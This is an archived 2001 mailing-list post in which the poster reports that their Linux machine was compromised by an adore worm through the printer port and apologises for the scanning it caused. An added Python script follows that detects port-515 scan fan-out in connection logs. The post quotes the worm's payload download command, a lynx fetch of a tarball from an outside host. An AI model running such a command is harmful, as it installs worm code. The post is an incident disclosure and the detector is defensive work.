Security Incidents mailing list archives

Mea Culpa


From: Etaoin Shrdlu <shrdlu () deaddrop org>
Date: Sat, 23 Jun 2001 11:15:56 -0700

If you saw anything from my redhat/linux machine in the past few hours,
sorry.

Jun 23 07:42|206.111.213.148|2650|65.169.x.x|53
Jun 23 07:42|206.111.213.148|2822|65.199.x.x|515
Jun 23 07:42|206.111.213.148|2823|65.199.x.x|515

Yet another rootkit. It was slated to be upgraded to progeny/linux over
the weekend, and I'm still deciding on whether to bother with forensics.
It is an automated script, so I doubt that much information will be
useful. The standard stuff on the standard, easily compromisable ports.
They got in through the printer port, which I thought had been shut
down. Famous last words.

If it appears to be unique, I'll send it off to the places that seem to
be archiving these things. Most of the interesting data (and certainly
an early trigger) that warned me instantly that something was up
(besides the mad green lights on the router when I wasn't doing anything
to cause them) was clog (connection logger), a fine piece of code whose
original author seems to have disappeared from the face of the earth.

...

Well, after further examination, it's just yet another adore worm
running pscan-* stuff against innocent folk out there. It was dumping
from the following:

lynx -dump http://go.163.com/laowang2001/red.tar >/usr/lib/red.tar

The rest is history (except for all the passwords I get to change, just
in case I had a duplicate somewhere). Again, if my bad boy bothered you
from Pacific time 11pm June 22 until approximately 8am June 23, I'm
sorry. I'll be reformatting the disk before it goes back up, and it'll
either have slack or debian (two civilized distros, in my personal
opinion), well-patched.

.shrdlu


--
Computer security is an oxymoron.
Prepare for the worst.
                -- Bruce Schneier
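A defender-side detector for the outbound fan-out that clog flagged in the message above, written as an added example (not the poster's code, nor clog's own). The five-field pipe layout is assumed from the three quoted records, and every log line embedded below is constructed.

```python
# Added example: flag a host that opens connections to many distinct peers
# on one service port (here 515/LPD), the pattern the compromised machine
# showed in its clog output. Record layout "Mon DD HH:MM|src|sport|dst|dport"
# is assumed from the quoted lines; the sample log is constructed.
from collections import defaultdict

# Constructed sample: 192.0.2.10 fans out to port 515 on six hosts within
# two minutes; 192.0.2.11 is benign repeat traffic to one HTTPS peer.
SAMPLE_LOG = """\
Jun 23 07:42|192.0.2.10|2650|198.51.100.1|53
Jun 23 07:42|192.0.2.10|2822|198.51.100.2|515
Jun 23 07:42|192.0.2.10|2823|198.51.100.3|515
Jun 23 07:42|192.0.2.10|2824|198.51.100.4|515
Jun 23 07:42|192.0.2.10|2825|198.51.100.5|515
Jun 23 07:43|192.0.2.10|2826|198.51.100.6|515
Jun 23 07:43|192.0.2.10|2827|198.51.100.7|515
Jun 23 07:43|192.0.2.11|40001|198.51.100.9|443
Jun 23 07:43|192.0.2.11|40002|198.51.100.9|443
"""


def parse_clog_line(line):
    """Split one clog record into (timestamp, src, sport, dst, dport).
    Addresses stay strings so masked values like 65.199.x.x still parse."""
    parts = line.strip().split("|")
    if len(parts) != 5:
        raise ValueError("unexpected clog record: %r" % line)
    ts, src, sport, dst, dport = parts
    return ts, src, int(sport), dst, int(dport)


def find_scanners(log_text, min_targets=5, watch_ports=(515,)):
    """Return {(src, dport): sorted target hosts} for every source that
    reached at least min_targets distinct hosts on a watched port."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, src, _sport, dst, dport = parse_clog_line(line)
        if dport in watch_ports:
            targets[(src, dport)].add(dst)
    return {key: sorted(hosts) for key, hosts in targets.items()
            if len(hosts) >= min_targets}


if __name__ == "__main__":
    for (src, dport), hosts in find_scanners(SAMPLE_LOG).items():
        print("%s reached %d hosts on port %d" % (src, len(hosts), dport))
```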
